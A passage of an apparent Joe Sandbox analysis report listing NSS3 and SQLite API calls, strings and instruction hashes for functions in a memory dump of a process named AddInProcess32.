                                                                                      • Instruction Fuzzy Hash: 3CA10372904201AFDF058F69CDC0E9E77B9EF09318F240466E814ABF51FB32D9158B91
                                                                                      APIs
                                                                                      • PK11_MakeIDFromPubKey.NSS3(?,00000000,00000105,00000001), ref: 6CD09E9E
                                                                                        • Part of subcall function 6CCFA062: SECITEM_DupItem_Util.NSS3(6CCE41F1,00000000,00000000,?,6CCFD894,00000000,00000000,00000000,?,6CCE41F1,?,?,?,?,?,00000000), ref: 6CCFA071
                                                                                      • PK11_IsInternal.NSS3(?,00000000,00000105,00000001), ref: 6CD09FD0
                                                                                      • PK11_ParamFromIV.NSS3(?,00000001,00000000,00000105,00000001), ref: 6CD0A01F
                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6CD0A0FB
                                                                                        • Part of subcall function 6CD119E4: PR_Unlock.NSS3(50DC458D,?,6CD0A761,6CCF4FEA,6CD0E826,6CCF4FEA,?,?,?,6CCF4FEA,?,?,6CD1180D,6CCF4FEA,?), ref: 6CD119ED
                                                                                      • PK11_FreeSymKey.NSS3(00000000,FFFFE002,00000000,00000105,00000001), ref: 6CD0A114
                                                                                        • Part of subcall function 6CD0EDE1: memset.VCRUNTIME140(?,00000000,?,?,?,?,?,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CD0EE45
                                                                                        • Part of subcall function 6CD0EDE1: PORT_Free_Util.NSS3(?,?,00000000,?,?,?,?,?,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CD0EE4D
                                                                                        • Part of subcall function 6CD0EDE1: PR_Lock.NSS3(?,00000000,00001002,?), ref: 6CD0EE6E
                                                                                        • Part of subcall function 6CD0EDE1: PR_Unlock.NSS3(?), ref: 6CD0EEA7
                                                                                        • Part of subcall function 6CD0EDE1: PORT_Free_Util.NSS3(EB2BE856,?,?,?), ref: 6CD0EEC3
                                                                                        • Part of subcall function 6CD0EDE1: PK11_FreeSlot.NSS3(D611683D,00000000,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CD0EECC
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000001,00000000,FFFFE002,00000000,00000105,00000001), ref: 6CD0A121
                                                                                        • Part of subcall function 6CD1BC6A: PORT_Free_Util.NSS3(?,?,?,6CCDD30A,?,00000000,?,?,00000000,?,6CCDCB3B,?,?), ref: 6CD1BC78
                                                                                        • Part of subcall function 6CD1BC6A: PORT_Free_Util.NSS3(00000000,?,?,6CCDD30A,?,00000000,?,?,00000000,?,6CCDCB3B,?), ref: 6CD1BC8D
                                                                                      • PORT_SetError_Util.NSS3(FFFFE002,00000000,00000105,00000001), ref: 6CD0A10E
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000001,00000000,00000105,00000001), ref: 6CD0A147
                                                                                      • PK11_GetInternalSlot.NSS3(00000000,00000105,00000001), ref: 6CD0A156
                                                                                      • PK11_UnwrapPrivKey.NSS3(00000000,?,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000105,00000001), ref: 6CD0A1B1
                                                                                      • PK11_LoadPrivKey.NSS3(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD0A1D3
                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?,?,00000000,00000000,?,00000000), ref: 6CD0A1E0
                                                                                      • PK11_FreeSlot.NSS3(00000000,?,?,00000000,00000000,?,00000000), ref: 6CD0A1E6
                                                                                      • PK11_FreeSlot.NSS3(00000000,00000000,00000105,00000001), ref: 6CD0A1F6
                                                                                      • PORT_SetError_Util.NSS3(00000000,00000054,00000000,00000105,00000001), ref: 6CD0A203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: K11_$Util$Free$Free_Slot$Item_$Error_FromInternalPrivUnlock$DestroyErrorLoadLockMakeParamPrivateUnwrapmemset
                                                                                      • String ID:
                                                                                      • API String ID: 3074565818-0
                                                                                      • Opcode ID: 099d81260fe9c01c5d9cd6a444dc5ddcd632846d9c89194cbcddb68b9f55011c
                                                                                      • Instruction ID: b9ed7fb8c17e3cd677c5ec52db05f13a2b9da8bf6efdb04c7d5016e9337ec3ff
                                                                                      • Opcode Fuzzy Hash: 099d81260fe9c01c5d9cd6a444dc5ddcd632846d9c89194cbcddb68b9f55011c
                                                                                      • Instruction Fuzzy Hash: E1C11971A01229DFEB20CF58CC80BD9B7B5BF08314F1081EAE95DA7651EB719A85CF61
                                                                                      APIs
                                                                                      • PK11_IsDisabled.NSS3(?,00000000), ref: 6CCF09EC
                                                                                      • PR_Lock.NSS3(?,00000000,00000000), ref: 6CCF0A00
                                                                                      • PR_Unlock.NSS3(?), ref: 6CCF0A18
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: DisabledK11_LockUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 148744884-0
                                                                                      • Opcode ID: 7b7d086cef906fcca6095fdc381aa7cb085183dfd7c961d32d205174fcbabb80
                                                                                      • Instruction ID: 5fb353d85aa5d41069b9d45838205b581347fa692981178fcd296972d14ffeec
                                                                                      • Opcode Fuzzy Hash: 7b7d086cef906fcca6095fdc381aa7cb085183dfd7c961d32d205174fcbabb80
                                                                                      • Instruction Fuzzy Hash: 03613732505A52EFDB419F25CC44B59BBB4FF06729F204226E92097E90EB31F862CBD0
                                                                                      APIs
                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,?,6CCC8713,00000000), ref: 6CCC8AFE
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      • PR_Lock.NSS3(?,?,00000000,?,?,6CCC8713,00000000), ref: 6CCC8B0F
                                                                                      • PR_SetError.NSS3(FFFFE8D5,00000000,?,00000000,?,?,6CCC8713,00000000), ref: 6CCC8B39
                                                                                      • PR_Unlock.NSS3(?,?,00000000,?,?,6CCC8713,00000000), ref: 6CCC8B46
                                                                                      • PR_Lock.NSS3(?,00000000,?,?,6CCC8713,00000000), ref: 6CCC8B5B
                                                                                      • PR_Unlock.NSS3(?,00000000,?,?,6CCC8713,00000000), ref: 6CCC8B75
                                                                                      • PR_DestroyCondVar.NSS3(?,?,?,?,00000000,?,?,6CCC8713,00000000), ref: 6CCC8B93
                                                                                      • PR_DestroyCondVar.NSS3(?,?,?,?,?,00000000,?,?,6CCC8713,00000000), ref: 6CCC8B9B
                                                                                      • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,00000000,?,?,6CCC8713,00000000), ref: 6CCC8BA3
                                                                                      • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,00000000,?,?,6CCC8713,00000000), ref: 6CCC8BAB
                                                                                      • PR_DestroyLock.NSS3(?,?,?,?,?,?,?,?,00000000,?,?,6CCC8713,00000000), ref: 6CCC8BB3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Destroy$Cond$Lock$ErrorUnlock$CurrentThread
                                                                                      • String ID:
                                                                                      • API String ID: 3459699787-0
                                                                                      • Opcode ID: 9647b63f37632a65263846da675b76b8cd90719b5a860f6fe0635fa14cb24bf7
                                                                                      • Instruction ID: f6c29e1bed96c14a28d783f7e857763f056505567ce81ee707c5392dfa01e164
                                                                                      • Opcode Fuzzy Hash: 9647b63f37632a65263846da675b76b8cd90719b5a860f6fe0635fa14cb24bf7
                                                                                      • Instruction Fuzzy Hash: 0A31ADB0A05600AFC7216F2ADC90C47B7F5BF09728325462AE65617FA0EB32F845CB41
                                                                                      APIs
                                                                                      • PK11_DoesMechanism.NSS3(FF5756EC,00000001,6CCF8538,?,6CD10A0D,00000106,00000000,?,6CCF8538,?,6CCF8538,00000000,6CCF8538,?,6CCF8538,?), ref: 6CCFEC22
                                                                                      • PK11_DoesMechanism.NSS3(?,00000001,6CCF8538,?,6CD10A0D,00000106,00000000,?,6CCF8538,?,6CCF8538,00000000,6CCF8538,?,6CCF8538,?), ref: 6CCFEC37
                                                                                        • Part of subcall function 6CD0EF0E: PK11_ExtractKeyValue.NSS3(6CCF8538,?,6CCF8538,?,6CD10A0D,00000106,00000000,?,6CCF8538,?,6CCF8538,00000000,6CCF8538,?,6CCF8538,?), ref: 6CD0EF5D
                                                                                      • PK11_FreeSlot.NSS3(?,?,?,?,?,?,?,?,?,?,6CCF8538,?,6CD10A0D,00000106,00000000,?), ref: 6CCFECB5
                                                                                      • PORT_SetError_Util.NSS3(FFFFE069,?,6CCF8538,?,6CD10A0D,00000106,00000000,?,6CCF8538,?,6CCF8538,00000000,6CCF8538,?,6CCF8538,?), ref: 6CCFECD6
                                                                                      • PK11_GenerateKeyPair.NSS3(?,00000000,00000200,6CCF8538,00000000,00000001,7D8B1475,?,6CCF8538,?,6CD10A0D,00000106,00000000), ref: 6CCFED13
                                                                                      • SECKEY_PublicKeyStrength.NSS3(6CCF8538,?,?,?,?,?,6CCF8538,?,6CD10A0D,00000106,00000000), ref: 6CCFED29
                                                                                      • PORT_Alloc_Util.NSS3(00000000,?,?,?,?,?,6CCF8538,?,6CD10A0D,00000106,00000000), ref: 6CCFED37
                                                                                      • PK11_PubWrapSymKey.NSS3(00000001,6CCF8538,6CD10A0D,6CD10A0D,?,?,?,?,?,6CCF8538,?,6CD10A0D,00000106,00000000), ref: 6CCFED50
                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6CCFED84
                                                                                        • Part of subcall function 6CCFA11E: PK11_HasAttributeSet.NSS3(?,6CCF8538,00000001,00000000,?,6CCF8538,00000100,0873FF00,6CCF8538,00000000,?,6CCF9724,6CCF8538,?,00000000,?), ref: 6CCFA146
                                                                                        • Part of subcall function 6CCFA11E: PK11_HasAttributeSet.NSS3(?,6CCF8538,00000002,00000000,0873FF00,6CCF8538,00000000,?,6CCF9724,6CCF8538,?,00000000,?,?), ref: 6CCFA196
                                                                                        • Part of subcall function 6CCFA11E: PK11_Authenticate.NSS3(?,00000001,?,?,00000000,?,?), ref: 6CCFA1A8
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,?,?,?,6CCF8538,?,6CD10A0D), ref: 6CCFED95
                                                                                      • SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,6CCF8538,?,6CD10A0D), ref: 6CCFEDA0
                                                                                      • SECKEY_DestroyPublicKey.NSS3(6CCF8538,?,?,?,?,6CCF8538,?,6CD10A0D), ref: 6CCFEDAF
                                                                                        • Part of subcall function 6CD095D6: PORT_InitCheapArena.NSS3(?,00000800,00000003), ref: 6CD095FE
                                                                                        • Part of subcall function 6CD095D6: PORT_DestroyCheapArena.NSS3(?,?,?,?,?,?,?,00000003), ref: 6CD09625
                                                                                        • Part of subcall function 6CD095D6: PORT_SetError_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000003), ref: 6CD09631
                                                                                      • PORT_SetError_Util.NSS3(FFFFE040,6CCF8538,?,6CD10A0D,00000106,00000000,?,6CCF8538,?,6CCF8538,00000000,6CCF8538,?,6CCF8538,?,00000000), ref: 6CCFEDBE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: K11_$Util$DestroyError_$ArenaAttributeCheapDoesFreeMechanismPublic$Alloc_AuthenticateExtractFree_GenerateInitPairPrivateSlotStrengthValueWrap
                                                                                      • String ID:
                                                                                      • API String ID: 497093772-0
                                                                                      • Opcode ID: 4e27f35f0321599335bfd76c7484e873ea8521eb671874ffb4ccbfca49e72544
                                                                                      • Instruction ID: c00963e8ba33f728dd3893e30aaceaebe65368b1db0f2e40050a5a5d1117cb19
                                                                                      • Opcode Fuzzy Hash: 4e27f35f0321599335bfd76c7484e873ea8521eb671874ffb4ccbfca49e72544
                                                                                      • Instruction Fuzzy Hash: 5251C47190120AABEF019FA99C41EEE77B9AF04758F204059F820A7E51FB75C6528BE1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CondError$Notify$InitLockUnlockWait
                                                                                      • String ID:
                                                                                      • API String ID: 1020677418-0
                                                                                      • Opcode ID: 40d3f66ff67d1c5c5657aebeb70f2a6f99e134f78ac0705212163d80dce0cc80
                                                                                      • Instruction ID: fe4a45ea6b50b7bfa39effaf418a5e405426fe2795d0d17eb0607a06b3ee9375
                                                                                      • Opcode Fuzzy Hash: 40d3f66ff67d1c5c5657aebeb70f2a6f99e134f78ac0705212163d80dce0cc80
                                                                                      • Instruction Fuzzy Hash: 2251CE35A05A129BC7215F399840E5777B0BB41779B304B6FE1269AED0FB30E885CB86
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE001,?,00000001,00000001,?,6CCE14D2,00000001,00000055,00000000,00000001,?,6CCE699C,?,00000001,00000000,?), ref: 6CCDFD51
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PR_Lock.NSS3(05203E50,00000000,00000001,?,00000001,00000001,?,6CCE14D2,00000001,00000055,00000000,00000001,?,6CCE699C,?,00000001), ref: 6CCDFD62
                                                                                      • PL_HashTableLookup.NSS3(05212160,00000000,6CCE14D2,00000001,00000055,00000000,00000001,?,6CCE699C,?,00000001,00000000,?,00000001,6CCE699C,?), ref: 6CCDFD83
                                                                                      • PORT_ZAlloc_Util.NSS3(00000008,6CCE14D2,00000001,00000055,00000000,00000001,?,6CCE699C,?,00000001,00000000,?,00000001,6CCE699C,?,00000001), ref: 6CCDFD9C
                                                                                      • SECITEM_DupItem_Util.NSS3(00000000,6CCE14D2,00000001,00000055,00000000,00000001,?,6CCE699C,?,00000001,00000000,?,00000001,6CCE699C,?,00000001), ref: 6CCDFDAD
                                                                                      • PL_HashTableAdd.NSS3(05212160,00000001,00000001,6CCE699C,?,00000001,00000000,?,00000001,6CCE699C,?,00000001,00000000,00000001,?,?), ref: 6CCDFDF5
                                                                                      • PR_Unlock.NSS3(6CCE14D2,00000001,00000055,00000000,00000001,?,6CCE699C,?,00000001,00000000,?,00000001,6CCE699C,?,00000001,00000000), ref: 6CCDFE16
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$HashTable$Alloc_ErrorError_Item_LockLookupUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3426687359-0
                                                                                      • Opcode ID: 255613d645db6632a5b6e04337544a426869507a81597f7051e7b731ca72c519
                                                                                      • Instruction ID: a18942091dd0d7ea98c5aefd1a458bc863ad318ef1a4cb3d3b9e80b67f31f8df
                                                                                      • Opcode Fuzzy Hash: 255613d645db6632a5b6e04337544a426869507a81597f7051e7b731ca72c519
                                                                                      • Instruction Fuzzy Hash: 6341B931605205AFDF019F65DC4099A77F9FF06328F150129FA4497FA1EB31AD50CB60
                                                                                      APIs
                                                                                        • Part of subcall function 6CCD87E8: PR_LogPrint.NSS3(PR_RecordTraceEntries: begins,6CCD8F0D), ref: 6CCD8806
                                                                                        • Part of subcall function 6CCD87E8: PR_GetEnvSecure.NSS3(NSPR_TRACE_LOG,00000000,6CCD8F0D), ref: 6CCD8823
                                                                                        • Part of subcall function 6CCD87E8: PR_LogPrint.NSS3(RecordTraceEntries: Environment variable not defined. Exiting,00000000,6CCD8F0D), ref: 6CCD883F
                                                                                      • PR_Lock.NSS3 ref: 6CCD8F40
                                                                                      • PR_LogPrint.NSS3(PR_RecordTraceEntries: LostData segments: %ld), ref: 6CCD8FBF
                                                                                      • PR_Unlock.NSS3 ref: 6CCD8FFE
                                                                                      • PR_Close.NSS3(00000000), ref: 6CCD904B
                                                                                      • PR_LogPrint.NSS3(RecordTraceEntries: exiting), ref: 6CCD9061
                                                                                      Strings
                                                                                      • PR_RecordTraceEntries: LostData segments: %ld, xrefs: 6CCD8FBA
                                                                                      • PR_RecordTraceEntries: Failed to initialize, xrefs: 6CCD8F22
                                                                                      • RecordTraceEntries: exiting, xrefs: 6CCD905C
                                                                                      • RecordTraceEntries: PR_Write(): is suspended, xrefs: 6CCD9031
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Print$CloseLockSecureUnlock
                                                                                      • String ID: PR_RecordTraceEntries: Failed to initialize$PR_RecordTraceEntries: LostData segments: %ld$RecordTraceEntries: PR_Write(): is suspended$RecordTraceEntries: exiting
                                                                                      • API String ID: 2161696824-1130509629
                                                                                      • Opcode ID: f106803ac259f3ce5c5291e3d05c24309dd7c7e95d0f1d7ba4a6a98f0adb4f6c
                                                                                      • Instruction ID: 04dd713e728d7b06ccb70c4d0682c35cb6464918c610b75fe89f3bf6b26ad04a
                                                                                      • Opcode Fuzzy Hash: f106803ac259f3ce5c5291e3d05c24309dd7c7e95d0f1d7ba4a6a98f0adb4f6c
                                                                                      • Instruction Fuzzy Hash: 5C31D3363261019FBF05DB2A9950E5B77FEE787338396912AE34593A10FB32B405CB81
                                                                                      APIs
                                                                                      • PR_GetEnv.NSS3(NSPR_INHERIT_FDS), ref: 6CCD3CDD
                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CCD3D03
                                                                                      • PR_sscanf.NSS3(?,%d:0x%lx,?,?), ref: 6CCD3D44
                                                                                      • PR_SetError.NSS3(FFFFE896,00000000), ref: 6CCD3D72
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      • PR_ImportPipe.NSS3(?), ref: 6CCD3D7E
                                                                                      • PR_ImportUDPSocket.NSS3(?), ref: 6CCD3D88
                                                                                      • PR_ImportTCPSocket.NSS3(?), ref: 6CCD3D92
                                                                                      • PR_ImportFile.NSS3(?), ref: 6CCD3D9C
                                                                                      • PR_SetError.NSS3(FFFFE896,00000000), ref: 6CCD3DBD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Import$ErrorSocket$CurrentFilePipeR_sscanfThreadstrncmp
                                                                                      • String ID: %d:0x%lx$NSPR_INHERIT_FDS
                                                                                      • API String ID: 1190318858-629032437
                                                                                      • Opcode ID: c9bcfa10bdcfa966e64fe283f5302501ce99521cf8472ec012399bd45905a768
                                                                                      • Instruction ID: cc20d97d5819e6f44273add57880344636eb96e25f3fdb91a57583c9d24d24b9
                                                                                      • Opcode Fuzzy Hash: c9bcfa10bdcfa966e64fe283f5302501ce99521cf8472ec012399bd45905a768
                                                                                      • Instruction Fuzzy Hash: 0031583E5291056ADF124FA8CC40BE97B78EF0365CF3E01C5EA1093A51FB21F944CA61
                                                                                      APIs
                                                                                      • sqlite3_mprintf.NSS3(docid INTEGER PRIMARY KEY,00000000,?,00000000,?,?,?,6CC7D1BE,00000000), ref: 6CC78873
                                                                                        • Part of subcall function 6CC63B3B: sqlite3_initialize.NSS3(?,6CC63A78,6CD51024,?,?), ref: 6CC63B3E
                                                                                      • sqlite3_mprintf.NSS3(%z, 'c%d%q',00000000,57B8458D,B869E850,00000000,?,00000000,?,?,?,6CC7D1BE,00000000), ref: 6CC7888D
                                                                                      • sqlite3_mprintf.NSS3(%z, langid,00000000,6CC7D1BE,00000000,?,00000000,?,?,?,6CC7D1BE,00000000), ref: 6CC788AE
                                                                                      • sqlite3_free.NSS3(00000000,00000000,6CC7D1BE,CREATE TABLE %Q.'%q_content'(%s),E987C607,02000000,00000000,00000000,?,00000000,?,?,?,6CC7D1BE,00000000), ref: 6CC788DC
                                                                                      Strings
                                                                                      • CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));, xrefs: 6CC78905
                                                                                      • CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);, xrefs: 6CC788F0
                                                                                      • %z, 'c%d%q', xrefs: 6CC78888
                                                                                      • CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);, xrefs: 6CC78926
                                                                                      • CREATE TABLE %Q.'%q_content'(%s), xrefs: 6CC788CD
                                                                                      • docid INTEGER PRIMARY KEY, xrefs: 6CC7886B
                                                                                      • %z, langid, xrefs: 6CC788A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mprintf$sqlite3_freesqlite3_initialize
                                                                                      • String ID: %z, 'c%d%q'$%z, langid$CREATE TABLE %Q.'%q_content'(%s)$CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);$CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));$CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);$docid INTEGER PRIMARY KEY
                                                                                      • API String ID: 1105964531-2877943987
                                                                                      • Opcode ID: 16d2f10722cf5b653f3e67a4ed52f470463ecb4c22ad005c3b5a42b8d47ce0ef
                                                                                      • Instruction ID: 8bfab3a39467aba3588bef0d22502b06cb3da32e2a5032a5aeeb2f8a26b38eb0
                                                                                      • Opcode Fuzzy Hash: 16d2f10722cf5b653f3e67a4ed52f470463ecb4c22ad005c3b5a42b8d47ce0ef
                                                                                      • Instruction Fuzzy Hash: F731A271C00605BBDF31CFA5C884D9BBBB9EB84318B14095EF60563A10F731E6599771
                                                                                      APIs
                                                                                      • PR_LogPrint.NSS3(PR_Counter: Deleting: QName: %s, RName: %s,?,?), ref: 6CCD0D5A
                                                                                        • Part of subcall function 6CCC78D9: PR_Init.NSS3(00000000), ref: 6CCC78F7
                                                                                        • Part of subcall function 6CCC78D9: PR_Now.NSS3(?,?,00000001,00000000,00000000), ref: 6CCC7923
                                                                                        • Part of subcall function 6CCC78D9: PR_ExplodeTime.NSS3(00000000,?,?,?,00000001,00000000,00000000), ref: 6CCC792A
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?,00000000,?,?,?,00000001,00000000), ref: 6CCC796A
                                                                                        • Part of subcall function 6CCC78D9: PR_GetCurrentThread.NSS3(00000001,00000000,00000000), ref: 6CCC7974
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC799C
                                                                                        • Part of subcall function 6CCC78D9: PR_vsnprintf.NSS3(?,000001FF,?,6CCC77F9,?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC79BC
                                                                                        • Part of subcall function 6CCC78D9: PR_vsmprintf.NSS3(?,6CCC77F9,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC79DA
                                                                                        • Part of subcall function 6CCC78D9: EnterCriticalSection.KERNEL32(05203804,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7A02
